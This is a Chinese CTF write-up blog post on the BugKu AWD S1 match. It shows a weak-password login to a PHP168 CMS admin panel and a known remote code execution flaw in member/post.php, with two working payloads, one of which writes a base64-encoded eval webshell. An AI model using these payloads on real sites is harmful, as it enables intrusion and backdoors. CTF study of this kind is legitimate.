BugKu -- AWD --S1排位赛-1

作者在本地环境中复现了s1赛季的题目,通过尝试弱口令进入PHP168CMS的后台。在发现文件上传功能并尝试绕过后,他利用CMS的整站远程命令执行漏洞,通过构造特定payload执行phpinfo()和写入一句话木马,成功创建了webshell,但由于本地环境限制未找到flag。
摘要由CSDN通过智能技术生成

写在前面

这两天把s1赛季能做的题都做出来了,然后在本地搭建了一下环境复现一下,这里再次感谢BUGKU里面的Anyyy师傅,直接让我白嫖环境,师傅也是上个赛季的前六名,实力强悍,让我学到很多,有兴趣的可以一起搞,尤其是会pwn的师傅,5月份可能就开始s4赛季了,可以一起冲击一下名次。也希望各位老表多多关注我,给各位老表鞠躬了。。。

正式开搞

打开首页,发现了这个php168,不过不着急,我们先搜集一波信息。
在这里插入图片描述

信息搜集

首先扫描一下目录,,发现疑似后台的目录。
在这里插入图片描述
访问一下目录,确实是管理后台,且没有验证码,是可以进行暴力破解的,但是这里我是先试了两个弱口令,直接就进去了,弱口令还是yyds的,用户名是admin,密码是123456
在这里插入图片描述

进入后台

登录到后台后,就可以找一找文件上传的功能点,看看能不能直接getshell
在这里插入图片描述

直接上传一个php文件进行尝试
在这里插入图片描述
发现上传失败了,然后简单试了试基本的绕过,发现都不行,应该是白名单,然后我这里发现一个有意思的功能点
在这里插入图片描述
我手动添加了php进去,这个和渗透测试1里面的做法差不多,但是发现失败了,依然无法上传。

峰回路转

那看来直接上传木马文件这条路是行不通了,这时候回到咱们最一开始,这个cms是php168,我查了一下,是6.0.2这个版本是有整站远程命令执行漏洞的,这不就来了吗
具体的原理参考:https://lcx.cc/post/1683/(因为我是菜逼,让我讲原理,肯定是不会的)
简单来说就是member/post.php这个文件是能够拼接命令达到执行命令的目的的
在这里插入图片描述

测试phpinfo是否能够执行

payload:

member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job=endHTML

在这里插入图片描述
直接写入一句话木马

payload:

/member/post.php?only=1&showHtml_Type[bencandy][1]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}&aid=1&job=endHTML

这个命令会在member目录下成一个密码为c的c.php,命令大家是可以自己DIY的
在这里插入图片描述
测试shell是否写成功,如果能够访问且能看到这个1,那就是成功了
在这里插入图片描述

连接webshell

在这里插入图片描述

这里因为我是本地大家的环境,权限空的比较严格,不能访问根目录,正常做题的话,flag就在根目录里。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值